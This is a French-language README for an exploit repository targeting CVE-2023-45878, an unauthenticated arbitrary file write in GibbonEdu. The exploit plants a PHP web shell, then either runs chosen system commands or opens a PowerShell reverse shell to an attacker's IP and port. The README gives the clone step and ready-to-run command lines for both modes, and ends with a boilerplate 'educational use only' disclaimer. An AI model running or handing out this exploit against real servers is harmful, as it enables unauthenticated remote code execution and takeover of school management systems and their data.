
GibbonEdu - Écriture arbitraire de fichier menant à une exécution de code à distance
GibbonEdu – Écriture arbitraire de fichier menant à l'exécution d'un Web Shell
Ce dépôt contient un exploit pour CVE-2023-45878, une vulnérabilité d'écriture arbitraire de fichier dans GibbonEdu. La vulnérabilité affecte le point d'accès rubrics_visualise_saveAjax.php et permet à un attaquant non authentifié de téléverser des fichiers arbitraires sur le serveur web.
Ce script exploite la vulnérabilité pour téléverser un Web Shell PHP et soit :
Le script prend en charge deux modes de fonctionnement :
--command (-c) : exécuter une commande système spécifique à distance.--shell (-s) : déclencher un reverse shell PowerShell vers l'écouteur de l'attaquant.git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <cible_domaine> -c "whoami"
python3 CVE-2023-45878.py -t <cible_domaine> -s -i <ip> -p <port>
Ce script est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de cet exploit sur des systèmes sans permission est illégale. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit.